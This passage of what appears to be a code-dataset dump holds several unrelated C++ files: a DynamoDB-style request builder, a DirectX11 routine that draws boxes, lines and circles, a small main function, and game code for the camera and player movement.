oJsonWriter.omitEndingLineFeed();
AwsMap* pDeleteItem = new AwsMap;
assert(pDeleteItem);
pDeleteItem->AddValue("/TableName", GetTableName());
if (bReturnConsumedCapacity)
{
pDeleteItem->AddValue("/ReturnConsumedCapacity", "TOTAL");
}
if (dwReturnValuesType > RETURN_VALUES_NONE)
{
pDeleteItem->AddValue("/ReturnValues", ReturnValuesType2Str(dwReturnValuesType));
}
pDeleteItem->AddValue("/Key/app_uid/S", m_sApp_uid);
pDeleteItem->AddValue("/Key/r_pid/S", m_sR_pid);
ostringstream oss;
for (unsigned int i = 0; i < expected_desc.vecExpectedItem.size(); ++i)
{
const ExpectedItem& item = expected_desc.vecExpectedItem[i];
FieldDesc& fld_desc = oTableDesc.mFieldDesc[item.udwFldNo];
oss.str("");
oss << "/Expected/" << fld_desc.sName << "/Exists";
pDeleteItem->AddBoolean(oss.str(), item.bExists);
if (item.bExists) //Exists为true时才需要Value
{
oss.str("");
oss << "/Expected/" << fld_desc.sName << "/Value/" << DataType2Str(fld_desc.dwType);
if (FIELD_TYPE_N == fld_desc.dwType)
{
pDeleteItem->AddValue(oss.str(), item.nValue);
continue;
}
if (FIELD_TYPE_S == fld_desc.dwType)
{
pDeleteItem->AddValue(oss.str(), item.sValue);
continue;
}
//FIELD_TYPE_B型不能expected
assert(0);
}
}
return pDeleteItem;
}
int TbProduct::OnDeleteItemReq(string& sPostData,
const ExpectedDesc& expected_desc, int dwReturnValuesType, bool bReturnConsumedCapacity)
{
++m_nSeq;
AwsMap* pDeleteItem = OnDeleteItemReq(expected_desc, dwReturnValuesType, bReturnConsumedCapacity);
ostringstream oss;
pDeleteItem->Dump(oss);
sPostData = oss.str();
delete pDeleteItem;
return 0;
}
int TbProduct::OnDeleteItemRsp(const Json::Value& item)
{
return OnResponse(item);
}
AwsMap* TbProduct::OnGetItemReq(unsigned int udwIdxNo,
bool bConsistentRead, bool bReturnConsumedCapacity)
{
oJsonWriter.omitEndingLineFeed();
assert(oTableDesc.mIndexDesc.find(udwIdxNo)!=oTableDesc.mIndexDesc.end());
IndexDesc& idx_desc = oTableDesc.mIndexDesc[udwIdxNo];
assert(idx_desc.sName == "PRIMARY"); //只能通过主键查询
AwsMap* pGetItem = new AwsMap;
assert(pGetItem);
pGetItem->AddValue("/TableName", GetTableName());
pGetItem->AddValue("/Key/app_uid/S", m_sApp_uid);
pGetItem->AddValue("/Key/r_pid/S", m_sR_pid);
ostringstream oss;
for (unsigned int i = 0; i < idx_desc.vecRtnFld.size(); ++i)
{
oss.str("");
oss << "/AttributesToGet[" << i << "]";
FieldDesc& fld_desc = oTableDesc.mFieldDesc[idx_desc.vecRtnFld[i]];
pGetItem->AddValue(oss.str(), fld_desc.sName);
}
pGetItem->AddBoolean("/ConsistentRead", bConsistentRead);
if (bReturnConsumedCapacity)
{
pGetItem->AddValue("/ReturnConsumedCapacity", "TOTAL");
}
return pGetItem;
}
int TbProduct::OnGetItemReq(string& sPostData, unsigned int udwIdxNo,
bool bConsistentRead, bool bReturnConsumedCapacity)
{
AwsMap* pGetItem = OnGetItemReq(udwIdxNo, bConsistentRead, bReturnConsumedCapacity);
ostringstream oss;
pGetItem->Dump(oss);
sPostData = oss.str();
delete pGetItem;
return 0;
}
int TbProduct::OnGetItemRsp(const Json::Value& item)
{
return OnResponse(item);
}
AwsMap* TbProduct::OnPutItemReq(
const ExpectedDesc& expected_desc, int dwReturnValuesType, bool bReturnConsumedCapacity)
{
oJsonWriter.omitEndingLineFeed();
AwsMap* pPutItem = new AwsMap;
assert(pPutItem);
string sBase64Encode;
string sJsonEncode;
pPutItem->AddValue("/TableName", GetTableName());
if (bReturnConsumedCapacity)
{
pPutItem->AddValue("/ReturnConsumedCapacity", "TOTAL");
}
if (dwReturnValuesType > RETURN_VALUES_NONE)
{
pPutItem->AddValue("/ReturnValues", ReturnValuesType2Str(dwReturnValuesType));
}
if (!m_sApp_uid.empty())
{
pPutItem->AddValue("/Item/app_uid/S", JsonEncode(m_sApp_uid, sJsonEncode));
}
if (!m_sR_pid.empty())
{
pPutItem->AddValue("/Item/r_pid/S", JsonEncode(m_sR_pid, sJsonEncode));
}
pPutItem->AddValue("/Item/sid/N", m_nSid);
if (!m_sDevice.empty())
{
pPutItem->AddValue("/Item/device/S", JsonEncode(m_sDevice, sJsonEncode));
}
if (!m_sRid.empty())
{
pPutItem->AddValue("/Item/rid/S", JsonEncode(m_sRid, sJsonEncode));
}
if (!m_sProduct_info.empty())
{
pPutItem->AddValue("/Item/product_info/S", JsonEncode(m_sProduct_info, sJsonEncode));
}
pPutItem->AddValue("/Item/btime/N", m_nBtime);
pPutItem->AddValue("/Item/lgtime/N", m_nLgtime);
pPutItem->AddValue("/Item/status/N", m_nStatus);
pPutItem->AddValue("/Item/seq/N", m_nSeq);
ostringstream oss;
for (unsigned int i = 0; i < expected_desc.vecExpectedItem.size(); ++i)
{
const ExpectedItem& item = expected_desc.vecExpectedItem[i];
assert(oTableDesc.mFieldDesc.find(item.udwFldNo)!=oTableDesc.mFieldDesc.end());
FieldDesc& fld_desc = oTableDesc.mFieldDesc[item.udwFldNo];
oss.str("");
oss << "/Expected/" << fld_desc.sName << "/Exists";
pPutItem->AddBoolean(oss.str(), item.bExists);
if (item.bExists) //Exists为true时才需要Value
{
oss.str("");
oss << "/Expected/" << fld_desc.sName << "/Value/" << DataType2Str(fld_desc.dwType);
if (FIELD_TYPE_N == fld_desc.dwType)
{
pPutItem->AddValue(oss.str(), item.nValue);
continue;
}
if (FIELD_TYPE_S == fld_desc.dwType)
{
pPutItem->AddValue(oss.str(), item.sValue);
continue;
}
//FIELD_TYPE_B型不能expected
assert(0);
}
}
return pPutItem;
}
int TbProduct::OnPutItemReq(string& sPostData,
const ExpectedDesc& expected_desc, int dwReturnValuesType, bool bReturnConsumedCapacity)
{
++m_nSeq;
AwsMap* pPutItem = OnPutItemReq(expected_desc, dwReturnValuesType, bReturnConsumedCapacity);
ostringstream oss;
pPutItem->Dump(oss);
sPostData = oss.str();
delete pPutItem;
return 0;
}
int TbProduct::OnPutItemRsp(const Json::Value& item)
{
return OnResponse(item);
}
int TbProduct::OnResponse(const Json::Value& item)
{
oJsonWriter.omitEndingLineFeed();
int dwResLen = 0;
dwResLen = 0;
this->Reset();
Json::Value::Members vecMembers = item.getMemberNames();
for (unsigned int i = 0; i < vecMembers.size(); ++i)
{
if (vecMembers[i] == "app_uid")
{
m_sApp_uid = item["app_uid"]["S"].asString();
continue;
}
if (vecMembers[i] == "r_pid")
{
m_sR_pid = item["r_pid"]["S"].asString();
continue;
}
if (vecMembers[i] == "sid")
{
m_nSid = strtoll(item["sid"]["N"].asString().c_str(), NULL, 10);
continue;
}
if (vecMembers[i] == "device")
{
m_sDevice = item["device"]["S"].asString();
continue;
}
if (vecMembers[i] == "rid")
{
m_sRid = item["rid"]["S"].asString();
continue;
}
if (vecMembers[i] == "product_info")
{
m_sProduct_info = item["product_info"]["S"].asString();
continue;
}
if (vecMembers[i] == "btime")
{
m_nBtime = strtoll(item["btime"]["N"].asString().c_str(), NULL, 10);
continue;
}
if (vecMembers[i] == "lgtime")
{
m_nLgtime = strtoll(item["lgtime"]["N"].asString().c_str(), NULL, 10);
continue;
}
if (vecMembers[i] == "status")
{
m_nStatus = strtoll(item["status"]["N"].asString().c_str(), NULL, 10);
continue;
}
if (vecMembers[i] == "seq")
{
m_nSeq = strtoll(item["seq"]["N"].asString().c_str(), NULL, 10);
continue;
}
}
return 0;
}
TINT64 TbProduct::GetSeq()
{
return m_nSeq;
}
|
0584ec419d524c87032b7965022955f3d3fbbe95 | d900eaef32972ada6e49a7ff3e58c98f2d55c9fb | /Project/DirectX11/DirectX11/GeometryGraph.cpp | 69fcc3b4258d5cdd2738bc4fc792ed671356a34a | [] | no_license | hanakita114514/RRMProject | 97a1973aa2f1cb305cf602e3bf93952a24e72acd | bcc366c6479752417858fd6be5fe02aa920bd15d | refs/heads/master | 2021-01-21T19:13:16.861695 | 2017-10-06T04:28:14 | 2017-10-06T04:28:14 | 92,117,623 | 0 | 0 | null | null | null | null | SHIFT_JIS | C++ | false | false | 14,929 | cpp | GeometryGraph.cpp | #include "GeometryGraph.h"
#include <D3DX11.h>
#include <D3D11.h>
#include "DeviceDx11.h"
#include "WindowControl.h"
#include "Vertex.h"
#include <math.h>
static const double PI = 3.141592f;
GeometryGraph::GeometryGraph()
{
}
GeometryGraph::~GeometryGraph()
{
Terminate();
}
ID3D11Buffer* CreateVertexBufferBox()
{
HRESULT hr = S_OK;
DeviceDx11& dev = DeviceDx11::Instance();
ID3D11Buffer* vb;
const int vertexNum = 5;
//頂点バッファの作成
Vertex2D vertices[vertexNum];
for (int i = 0; i < vertexNum; i++)
{
vertices[i].pos.x = 0;
vertices[i].pos.y = 0;
vertices[i].pos.z = 0;
vertices[i].uv.x = 0;
vertices[i].uv.y = 0;
}
//頂点バッファの作成
D3D11_BUFFER_DESC bufdesc = {};
bufdesc.ByteWidth = sizeof(vertices);
bufdesc.BindFlags = D3D11_BIND_VERTEX_BUFFER;
bufdesc.Usage = D3D11_USAGE_DYNAMIC;
bufdesc.CPUAccessFlags = D3D11_CPU_ACCESS_WRITE;
bufdesc.MiscFlags = 0;
bufdesc.StructureByteStride = sizeof(Vertex2D);
D3D11_SUBRESOURCE_DATA subdata = {};
subdata.pSysMem = &vertices[0];
hr = dev.Device()->CreateBuffer(&bufdesc, &subdata, &vb);
return vb;
}
ID3D11Buffer* CreateVertexBufferLine()
{
HRESULT hr = S_OK;
DeviceDx11& dev = DeviceDx11::Instance();
ID3D11Buffer* vb;
const int vertexNum = 2;
//頂点バッファの作成
Vertex2D vertices[vertexNum];
for (int i = 0; i < vertexNum; i++)
{
//左上
vertices[i].pos.x = 0;
vertices[i].pos.y = 0;
vertices[i].pos.z = 0;
vertices[i].uv.x = 0;
vertices[i].uv.y = 0;
}
//頂点バッファの作成
D3D11_BUFFER_DESC bufdesc = {};
bufdesc.ByteWidth = sizeof(vertices);
bufdesc.BindFlags = D3D11_BIND_VERTEX_BUFFER;
bufdesc.Usage = D3D11_USAGE_DYNAMIC;
bufdesc.CPUAccessFlags = D3D11_CPU_ACCESS_WRITE;
bufdesc.MiscFlags = 0;
bufdesc.StructureByteStride = sizeof(Vertex2D);
D3D11_SUBRESOURCE_DATA subdata = {};
subdata.pSysMem = &vertices[0];
hr = dev.Device()->CreateBuffer(&bufdesc, &subdata, &vb);
return vb;
}
ID3D11Buffer* CreateVertexBufferCircle()
{
HRESULT hr = S_OK;
DeviceDx11& dev = DeviceDx11::Instance();
ID3D11Buffer* vb;
const int divNum = 512;
Vertex2D vertices[divNum];
WindowControl& wc = WindowControl::Instance();
for (int i = 0; i < divNum; i++)
{
vertices[i].pos.x = 0;
vertices[i].pos.y = 0;
vertices[i].pos.z = 0;
vertices[i].uv.x = 0;
vertices[i].uv.y = 0;
}
//頂点バッファの作成
D3D11_BUFFER_DESC bufdesc = {};
bufdesc.ByteWidth = sizeof(vertices);
bufdesc.BindFlags = D3D11_BIND_VERTEX_BUFFER;
bufdesc.Usage = D3D11_USAGE_DYNAMIC;
bufdesc.CPUAccessFlags = D3D11_CPU_ACCESS_WRITE;
bufdesc.MiscFlags = 0;
bufdesc.StructureByteStride = sizeof(Vertex2D);
D3D11_SUBRESOURCE_DATA subdata = {};
subdata.pSysMem = &vertices[0];
hr = dev.Device()->CreateBuffer(&bufdesc, &subdata, &vb);
return vb;
}
bool
GeometryGraph::Init()
{
DeviceDx11& dev = DeviceDx11::Instance();
HRESULT hr = CreateShader(_vs2d, _vs3d, _layout, _ps);
if (FAILED(hr))
{
return false;
}
unsigned int color = 0xffffffff;
//カラー用コンスタントバッファの生成
D3D11_BUFFER_DESC colorBufferDesc = {};
colorBufferDesc.BindFlags = D3D11_BIND_CONSTANT_BUFFER;
colorBufferDesc.ByteWidth = sizeof(unsigned int) + (16 - sizeof(unsigned int) % 16) % 16;
colorBufferDesc.CPUAccessFlags = D3D11_CPU_ACCESS_WRITE;
colorBufferDesc.Usage = D3D11_USAGE_DYNAMIC;
D3D11_SUBRESOURCE_DATA mbufsub = {};
mbufsub.pSysMem = &color;
hr = dev.Device()->CreateBuffer(&colorBufferDesc, &mbufsub, &_colorBuf);
if (FAILED(hr))
{
return false;
}
dev.Context()->PSSetConstantBuffers(1, 1, &_colorBuf);
//箱頂点バッファの作成
_vbBox = CreateVertexBufferBox();
//線用
_vbLine = CreateVertexBufferLine();
//円用
_vbCircle = CreateVertexBufferCircle();
return true;
}
void
GeometryGraph::Terminate()
{
_vbBox->Release();
_vbLine->Release();
_vbCircle->Release();
_vs2d->Release();
_vs3d->Release();
_ps->Release();
_layout->Release();
_colorBuf->Release();
}
bool
GeometryGraph::CreateShader(ID3D11VertexShader*& vs2d, ID3D11VertexShader*& vs3d, ID3D11InputLayout*& layout, ID3D11PixelShader*& ps)
{
DeviceDx11& dev = DeviceDx11::Instance();
ID3D10Blob* shader = nullptr;
ID3D10Blob* shaderError = nullptr;
//2D頂点シェーダ
HRESULT result = D3DX11CompileFromFile("2DShader.hlsl",
nullptr,
nullptr,
"VertexShader2D",
"vs_5_0",
0,
0,
nullptr,
&shader,
&shaderError,
nullptr
);
if (FAILED(result))
{
return false;
}
result = dev.Device()->CreateVertexShader(shader->GetBufferPointer(),
shader->GetBufferSize(),
nullptr,
&vs2d);
char* errmsg;
if (shaderError != nullptr)
{
errmsg = static_cast<char*>(shaderError->GetBufferPointer());
OutputDebugString(errmsg);
shaderError->Release();
}
shader->Release();
if (FAILED(result))
{
return false;
}
//3D頂点シェーダ
result = D3DX11CompileFromFile("2DShader.hlsl",
nullptr,
nullptr,
"VertexShader3D",
"vs_5_0",
0,
0,
nullptr,
&shader,
&shaderError,
nullptr
);
if (FAILED(result))
{
return false;
}
result = dev.Device()->CreateVertexShader(shader->GetBufferPointer(),
shader->GetBufferSize(),
nullptr,
&vs3d);
if (shaderError != nullptr)
{
errmsg = static_cast<char*>(shaderError->GetBufferPointer());
OutputDebugString(errmsg);
shaderError->Release();
}
//インプットレイアウト
D3D11_INPUT_ELEMENT_DESC inputElemDescs[] =
{
{ "SV_POSITION", 0, DXGI_FORMAT_R32G32B32_FLOAT, 0, 0, D3D11_INPUT_PER_VERTEX_DATA, 0 },
{ "TEXCOORD", 0, DXGI_FORMAT_R32G32_FLOAT, 0, D3D11_APPEND_ALIGNED_ELEMENT, D3D11_INPUT_PER_VERTEX_DATA, 0 },
};
result = dev.Device()->CreateInputLayout(inputElemDescs,
sizeof(inputElemDescs) / sizeof(inputElemDescs[0]),
shader->GetBufferPointer(),
shader->GetBufferSize(),
&layout);
shader->Release();
if (FAILED(result))
{
return false;
}
//ピクセルシェーダ
result = D3DX11CompileFromFile("2DShader.hlsl",
nullptr,
nullptr,
"GeometryPS",
"ps_5_0",
0,
0,
nullptr,
&shader,
&shaderError,
nullptr
);
result = dev.Device()->CreatePixelShader(shader->GetBufferPointer(),
shader->GetBufferSize(),
nullptr,
&ps);
if (FAILED(result))
{
return false;
}
return true;
}
void
GeometryGraph::DrawBox(float lx, float ly, float rx, float ry, unsigned int color, bool fillFlag)
{
HRESULT result = S_OK;
DeviceDx11& dev = DeviceDx11::Instance();
Vertex2D vertices[5];
WindowControl& wc = WindowControl::Instance();
float width = rx - lx;
float height = ry - ly;
//ウィンドウ座標系を-1〜1にクランプ
float fx = (lx - wc.WindowWidth() / 2) / (wc.WindowWidth() / 2);
float fy = ((ly - wc.WindowHeight() / 2) / (wc.WindowHeight() / 2)) * -1;
float fw = (width) / (wc.WindowWidth() / 2);
float fh = (height) / (wc.WindowHeight() / 2);
//左上
vertices[0].pos.x = fx;
vertices[0].pos.y = fy;
vertices[0].pos.z = 0;
vertices[0].uv.x = 0;
vertices[0].uv.y = 0;
//右上
vertices[1].pos.x = fx + fw;
vertices[1].pos.y = fy;
vertices[1].pos.z = 0;
vertices[1].uv.x = 1;
vertices[1].uv.y = 0;
//右下
vertices[2].pos.x = fx + fw;
vertices[2].pos.y = fy - fh;
vertices[2].pos.z = 0;
vertices[2].uv.x = 1;
vertices[2].uv.y = 1;
//左下
vertices[3].pos.x = fx;
vertices[3].pos.y = fy - fh;
vertices[3].pos.z = 0;
vertices[3].uv.x = 0;
vertices[3].uv.y = 1;
//左上
vertices[4].pos.x = fx;
vertices[4].pos.y = fy;
vertices[4].pos.z = 0;
vertices[4].uv.x = 0;
vertices[4].uv.y = 0;
D3D11_MAPPED_SUBRESOURCE mappedsub = {};
result = dev.Context()->Map(_colorBuf, 0, D3D11_MAP_WRITE_DISCARD, 0, &mappedsub);
memcpy(mappedsub.pData, &color, sizeof(unsigned int));
dev.Context()->Unmap(_colorBuf, 0);
mappedsub = {};
result = dev.Context()->Map(_vbBox, 0, D3D11_MAP_WRITE_DISCARD, 0, &mappedsub);
memcpy(mappedsub.pData, vertices, sizeof(Vertex2D) * 5);
dev.Context()->Unmap(_vbBox, 0);
unsigned int offset = 0;
unsigned int stride = sizeof(Vertex2D);
if (fillFlag)
{
dev.Context()->IASetPrimitiveTopology(D3D11_PRIMITIVE_TOPOLOGY_TRIANGLESTRIP);
}
else
{
dev.Context()->IASetPrimitiveTopology(D3D11_PRIMITIVE_TOPOLOGY_LINESTRIP);
}
dev.Context()->VSSetShader(_vs2d, nullptr, 0);
dev.Context()->PSSetShader(_ps, nullptr, 0);
dev.Context()->IASetInputLayout(_layout);
dev.Context()->IASetVertexBuffers(0, 1, &_vbBox, &stride, &offset);
dev.Context()->Draw(5, 0);
}
void
GeometryGraph::DrawLine(float lx, float ly, float rx, float ry, unsigned int color)
{
HRESULT result = S_OK;
DeviceDx11& dev = DeviceDx11::Instance();
Vertex2D vertices[2];
WindowControl& wc = WindowControl::Instance();
float width = rx - lx;
float height = ry - ly;
//ウィンドウ座標系を-1〜1にクランプ
float fx = (lx - wc.WindowWidth() / 2) / (wc.WindowWidth() / 2);
float fy = ((ly - wc.WindowHeight() / 2) / (wc.WindowHeight() / 2)) * -1;
float fw = (width) / (wc.WindowWidth() / 2);
float fh = (height) / (wc.WindowHeight() / 2);
//左上
vertices[0].pos.x = fx;
vertices[0].pos.y = fy;
vertices[0].pos.z = 0;
vertices[0].uv.x = 0;
vertices[0].uv.y = 0;
//右上
vertices[1].pos.x = fx + fw;
vertices[1].pos.y = fy - fh;
vertices[1].pos.z = 0;
vertices[1].uv.x = 1;
vertices[1].uv.y = 0;
D3D11_MAPPED_SUBRESOURCE mappedsub = {};
result = dev.Context()->Map(_colorBuf, 0, D3D11_MAP_WRITE_DISCARD, 0, &mappedsub);
memcpy(mappedsub.pData, &color, sizeof(unsigned int));
dev.Context()->Unmap(_colorBuf, 0);
mappedsub = {};
result = dev.Context()->Map(_vbLine, 0, D3D11_MAP_WRITE_DISCARD, 0, &mappedsub);
memcpy(mappedsub.pData, vertices, sizeof(Vertex2D) * 2);
dev.Context()->Unmap(_vbLine, 0);
unsigned int offset = 0;
unsigned int stride = sizeof(Vertex2D);
dev.Context()->IASetPrimitiveTopology(D3D11_PRIMITIVE_TOPOLOGY_LINESTRIP);
dev.Context()->VSSetShader(_vs2d, nullptr, 0);
dev.Context()->PSSetShader(_ps, nullptr, 0);
dev.Context()->IASetInputLayout(_layout);
dev.Context()->IASetVertexBuffers(0, 1, &_vbLine, &stride, &offset);
dev.Context()->Draw(2, 0);
//DrawingStructure ds = {};
//ds.vs = _vs2d;
//ds.ps = _ps;
//ds.layout = _layout;
//ds.texture = nullptr;
//ds.vb = vb;
//ds.offset = 0;
//ds.drawNum = 2;
//ds.topology = D3D11_PRIMITIVE_TOPOLOGY_LINESTRIP;
//ds.colorBuffer = colorBuf;
//ds.stride = sizeof(Vertex2D);
}
void
GeometryGraph::DrawPoint(float x, float y, unsigned int color)
{
HRESULT result = S_OK;
DeviceDx11& dev = DeviceDx11::Instance();
ID3D11Buffer* vb;
Vertex2D vertices[2];
WindowControl& wc = WindowControl::Instance();
//ウィンドウ座標系を-1〜1にクランプ
float fx = (x - wc.WindowWidth() / 2) / (wc.WindowWidth() / 2);
float fy = ((y - wc.WindowHeight() / 2) / (wc.WindowHeight() / 2)) * -1;
//左上
vertices[0].pos.x = fx;
vertices[0].pos.y = fy;
vertices[0].pos.z = 0;
vertices[0].uv.x = 0;
vertices[0].uv.y = 0;
//頂点バッファの作成
D3D11_BUFFER_DESC bufdesc = {};
bufdesc.ByteWidth = sizeof(vertices);
bufdesc.BindFlags = D3D11_BIND_VERTEX_BUFFER;
bufdesc.Usage = D3D11_USAGE_DEFAULT;
bufdesc.CPUAccessFlags = 0;
bufdesc.MiscFlags = 0;
bufdesc.StructureByteStride = sizeof(Vertex2D);
D3D11_SUBRESOURCE_DATA subdata = {};
subdata.pSysMem = &vertices[0];
result = dev.Device()->CreateBuffer(&bufdesc, &subdata, &vb);
D3D11_MAPPED_SUBRESOURCE mappedsub = {};
result = dev.Context()->Map(_colorBuf, 0, D3D11_MAP_WRITE_DISCARD, 0, &mappedsub);
memcpy(mappedsub.pData, &color, sizeof(unsigned int));
dev.Context()->Unmap(_colorBuf, 0);
//unsigned int offset = 0;
//unsigned int stride = sizeof(Vertex2D);
//dev.Context()->IASetPrimitiveTopology(D3D11_PRIMITIVE_TOPOLOGY_POINTLIST);
//dev.Context()->VSSetShader(_vs2d, nullptr, 0);
//dev.Context()->PSSetShader(_ps, nullptr, 0);
//dev.Context()->IASetInputLayout(_layout);
////dev.Context()->PSSetShaderResources(0, 1, &texture);
//dev.Context()->IASetVertexBuffers(0, 1, &vb, &stride, &offset);
//dev.Context()->Draw(1, 0);
//DrawingStructure ds = {};
//ds.vs = _vs2d;
//ds.ps = _ps;
//ds.layout = _layout;
//ds.texture = nullptr;
//ds.vb = vb;
//ds.offset = 0;
//ds.drawNum = 1;
//ds.topology = D3D11_PRIMITIVE_TOPOLOGY_POINTLIST;
//ds.colorBuffer = colorBuf;
//ds.stride = sizeof(Vertex2D);
}
void
GeometryGraph::DrawCircle(float x, float y, float r, unsigned int color, bool fillFlag)
{
HRESULT result = S_OK;
DeviceDx11& dev = DeviceDx11::Instance();
const int divNum = 512;
Vertex2D vertices[divNum];
WindowControl& wc = WindowControl::Instance();
//ウィンドウ座標系を-1〜1にクランプ
float fx = (x - wc.WindowWidth() / 2) / (wc.WindowWidth() / 2);
float fy = ((y - wc.WindowHeight() / 2) / (wc.WindowHeight() / 2)) * -1;
for (int i = 0; i < divNum; i++)
{
vertices[i].pos.x = (r / wc.WindowWidth()) * cos((PI * 2 / divNum) * i) + fx;
vertices[i].pos.y = (r / wc.WindowHeight()) * sin((PI * 2 / divNum) * i) + fy;
vertices[i].pos.z = 0;
vertices[i].uv.x = 0;
vertices[i].uv.y = 0;
}
D3D11_MAPPED_SUBRESOURCE mappedsub = {};
result = dev.Context()->Map(_colorBuf, 0, D3D11_MAP_WRITE_DISCARD, 0, &mappedsub);
memcpy(mappedsub.pData, &color, sizeof(unsigned int));
dev.Context()->Unmap(_colorBuf, 0);
mappedsub = {};
result = dev.Context()->Map(_vbCircle, 0, D3D11_MAP_WRITE_DISCARD, 0, &mappedsub);
memcpy(mappedsub.pData, vertices, sizeof(Vertex2D) * divNum);
dev.Context()->Unmap(_vbCircle, 0);
unsigned int offset = 0;
unsigned int stride = sizeof(Vertex2D);
//DrawingStructure ds = {};
//ds.vs = _vs2d;
//ds.ps = _ps;
//ds.layout = _layout;
//ds.texture = nullptr;
//ds.vb = vb;
//ds.offset = 0;
//ds.drawNum = divNum;
//ds.colorBuffer = colorBuf;
//ds.stride = sizeof(Vertex2D);
if (fillFlag)
{
dev.Context()->IASetPrimitiveTopology(D3D11_PRIMITIVE_TOPOLOGY_TRIANGLESTRIP);
//ds.topology = D3D11_PRIMITIVE_TOPOLOGY_TRIANGLESTRIP;
}
else
{
dev.Context()->IASetPrimitiveTopology(D3D11_PRIMITIVE_TOPOLOGY_LINESTRIP);
//ds.topology = D3D11_PRIMITIVE_TOPOLOGY_LINESTRIP;
}
dev.Context()->VSSetShader(_vs2d, nullptr, 0);
dev.Context()->PSSetShader(_ps, nullptr, 0);
dev.Context()->IASetInputLayout(_layout);
dev.Context()->IASetVertexBuffers(0, 1, &_vbCircle, &stride, &offset);
dev.Context()->Draw(divNum, 0);
} |
3ea676f60b0c6b069e7afd560d90d5326651a03d | efde4c60e4bcd115cd3f6038e111abaf6075bb7d | /problem2p6/problem2p6/main.cpp | 23a71531a4f316973bd56c84915cca7da13bdafc | [] | no_license | dendisuhubdy/fim501 | 7c1e95e26211477dddf757b489e77d0e893d7cee | b7217046eb05838c383cce05d4b6ce2fe8b184f0 | refs/heads/master | 2021-01-22T03:06:27.002175 | 2014-10-08T14:54:15 | 2014-10-08T14:54:15 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 310 | cpp | main.cpp | //
// main.cpp
// problem2p6
//
// Created by Dendi Suhubdy on 8/25/14.
// Copyright (c) 2014 NCSU. All rights reserved.
//
#include <iostream>
#include "temp.h"
int main(int argc, const char * argv[])
{
temp temperature;
temperature.getinput();
temperature.displayoutput();
return 0;
}
|
f8a78ecc4bbac461a5672dce85fe6c6eca9c556e | 933a0bebe72067c0fa15c9fe43d5a8d69beff2d0 | /code/game.cpp | 47bbdfc8133fc02922ca04a25dff66a00fd6ac33 | [] | no_license | nian0601/dual_engine | 5bfbfeba3a8a922c6060ad4da6bc2e0f5b9911f6 | c21c824bf8dab68c7ad69c3044d803e702b26581 | refs/heads/master | 2021-06-26T22:03:56.622836 | 2020-11-30T21:40:53 | 2020-11-30T21:40:53 | 154,213,166 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 5,567 | cpp | game.cpp | void ToggleDebugCamera(Camera& aCamera)
{
if(ourGameState.myUseDebugCamera)
{
Vector4f translation = GetTranslation(aCamera.myView);
ourGameState.myPlayer.myPosition.x = translation.x;
ourGameState.myPlayer.myPosition.y = translation.y;
ourGameState.myPlayer.myPosition.z = translation.z;
ourGameState.myUseDebugCamera = false;
}
else
{
ourGameState.myUseDebugCamera = true;
}
}
Vector3f CalculateCameraPosition(float aDeltaTime, Camera& aCamera)
{
if(ourGameState.myUseDebugCamera)
{
float movement = 10.f;
if(KeyDown(DEK_LSHIFT))
movement = 50.f;
movement *= aDeltaTime;
Matrix& viewMatrix = aCamera.myView;
if(KeyDown(DEK_A))
TranslateRight(viewMatrix, -movement);
if(KeyDown(DEK_D))
TranslateRight(viewMatrix, movement);
if(KeyDown(DEK_W))
TranslateForward(viewMatrix, movement);
if(KeyDown(DEK_S))
TranslateForward(viewMatrix, -movement);
if(KeyDown(DEK_Q))
TranslateUp(viewMatrix, -movement);
if(KeyDown(DEK_E))
TranslateUp(viewMatrix, movement);
Vector4f translation = GetTranslation(aCamera.myView);
return {translation.x, translation.y, translation.z};
}
else
{
CameraEntity& cameraEntity = ourGameState.myCameraEntity;
return cameraEntity.myParentEntity->myPosition + cameraEntity.myParentOffset;
}
}
void UpdateCamera(float aDeltaTime, Camera& aCamera)
{
float rotationSpeed = 3.14f * 0.1f * aDeltaTime;
Vector3f cameraPosition = CalculateCameraPosition(aDeltaTime, aCamera);
SetTranslation(aCamera.myView, {0.f, 0.f, 0.f});
Matrix xRotation = RotationMatrixAxisAngle(aCamera.myView.myRows[0].myData, rotationSpeed * ourInput.myMouseDelta.y);
Matrix yRotation = RotationMatrixY(rotationSpeed * ourInput.myMouseDelta.x);
aCamera.myView = aCamera.myView * xRotation;
aCamera.myView = aCamera.myView * yRotation;
SetTranslation(aCamera.myView, cameraPosition);
aCamera.myInvertedView = InverseSimple(aCamera.myView);
ourInput.myMouseRay.myStart = Unproject(
ourInput.myMousePosition, 0.f, aCamera.myInvertedView, aCamera.myProjection, aCamera.myWindowSize);
ourInput.myMouseRay.myEnd = Unproject(
ourInput.myMousePosition, 1.f, aCamera.myInvertedView, aCamera.myProjection, aCamera.myWindowSize);
ourInput.myMiddleOfScreenRay.myStart = Unproject(
aCamera.myWindowSize * 0.5f, 0.f, aCamera.myInvertedView, aCamera.myProjection, aCamera.myWindowSize);
ourInput.myMiddleOfScreenRay.myEnd = Unproject(
aCamera.myWindowSize * 0.5f, 1.f, aCamera.myInvertedView, aCamera.myProjection, aCamera.myWindowSize);
}
void UpdatePlayerVelocity(float aDeltaTime, Camera& aCamera)
{
// Use the Cross-product to figure out where 'forward' is regardless
// of X-rotation of the camera
Vector3f right = aCamera.myView.myRows[0].myData;
Vector3f up = {0.f, 1.f, 0.f};
Vector3f forward = Cross(right, up);
float moveSpeed = 10.f;
right *= moveSpeed;
forward *= moveSpeed;
Entity& player = ourGameState.myPlayer;
player.myVelocity.x = 0.f;
player.myVelocity.z = 0.f;
if(KeyDown(DEK_A))
player.myVelocity -= right;
if(KeyDown(DEK_D))
player.myVelocity += right;
if(KeyDown(DEK_W))
player.myVelocity += forward;
if(KeyDown(DEK_S))
player.myVelocity -= forward;
if(KeyDownThisFrame(DEK_SPACE))
{
player.myVelocity.y += 20.f * aDeltaTime;
player.myVelocity.y = Min(player.myVelocity.y, 0.1f);
}
player.myVelocity.y -= 0.25f * aDeltaTime;
player.myVelocity.x *= aDeltaTime;
player.myVelocity.z *= aDeltaTime;
if(MouseDownThisFrame(DEK_LEFTMOUSE))
{
ModifyBlockUnderMouse(ourInput.myMiddleOfScreenRay, InvalidBlockType);
}
}
void UpdatePlayer(float aDeltaTime, Camera& aCamera)
{
Entity& player = ourGameState.myPlayer;
UpdatePlayerVelocity(aDeltaTime, aCamera);
DE_Ray movementRay;
movementRay.myStart = player.myPosition;
movementRay.myThickness = 0.1f;
GrowingArray<ChunkRaycastHit> hits;
BlockRaycastHit closestBlockHit;
ArrayAlloc(hits, 8);
